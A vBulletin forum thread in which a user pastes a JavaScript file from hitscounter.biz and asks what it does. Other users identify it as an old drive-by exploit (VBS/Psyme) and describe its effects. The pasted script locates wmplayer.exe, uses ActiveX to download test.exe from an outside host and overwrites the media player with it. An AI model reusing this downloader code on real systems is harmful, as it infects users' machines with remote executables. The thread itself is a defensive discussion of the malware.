|
What does this script do exactly?
http://traffic.hitscounter.biz/count65/ss.js.php
wmplayerpaths= [ "C:\\Programmer\\Windows Media Player\\wmplayer.exe", "D:\\Programmer\\Windows Media Player\\wmplayer.exe", "C:\\Program\\Windows Media Player\\wmplayer.exe", "D:\\Program\\Windows Media Player\\wmplayer.exe", "C:\\Programme\\Windows Media Player\\wmplayer.exe", "D:\\Programme\\Windows Media Player\\wmplayer.exe", "C:\\Programmi\\Windows Media Player\\wmplayer.exe", "D:\\Programmi\\Windows Media Player\\wmplayer.exe", "C:\\Programfiler\\Windows Media Player\\wmplayer.exe", "D:\\Programfiler\\Windows Media Player\\wmplayer.exe", "C:\\Programas\\Windows Media Player\\wmplayer.exe", "D:\\Programas\\Windows Media Player\\wmplayer.exe", "C:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Program Files\\Windows Media Player\\wmplayer.exe", "C:\\Program Files\\Windows Media Player\\wmplayer.exe" ]; function IfExists(path) { try { var r = 1; var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.LoadFromFile(path); } catch (e) { return 0; } return 1; } try { for (i=0;i<wmplayerpaths.length;i++) { wmplayerpath = wmplayerpaths[i]; if (IfExists(wmplayerpath)) break; } var x = new ActiveXObject("Microsoft.XMLHTTP"); xhahahahahaha("GET", "http://download.hitscounter.biz/count65/test.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.Write(x.responseBody); s.SaveToFile(wmplayerpath,2); location.href = "mms://"; } catch(e) { } VBS/Psyme:http://us.mcafee.com/virusInfo/defau...virus_k=100749 thanks for your help :thumbsup |
it appears to be trying to find windows media player and then streaming something
|
tests in several languages if the windows media player is installed
( or at least at the hardddisk ) then loads an test.exe and looks likes it replaces the media player or links to it. |
put the sript here as a text link...then we can read all the ahahaa shit
|
See's what version of WMP is on your system??:2 cents:
|
Quote:
http://www.babes-club.com/jelena_foot/01.html |
no iframe in that page
Well not for me. |
beh i had that once :-/ a version of it ...
It replaces a windows media player file .. then copies a file to your %windows% folder ... makes sure it starts up when your computer starts ... and that you can't delete it (easely) After that came into my comp ... 90% of the links on my own webpage .. went somewhere else ( thanks to that i knew directly i had something in my comp) :( |
Quote:
Its an exploit if its a gallery submitted delete it if its a trade you might want to delete it. Its an old exploit also not many people still use it. |
I dont get an iframe on that page but I see its another one of those http://yourownfreehost.com/ sites, a lot of funky shit seems to be coming up on those sites
|
| All times are GMT -7. The time now is 11:39 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123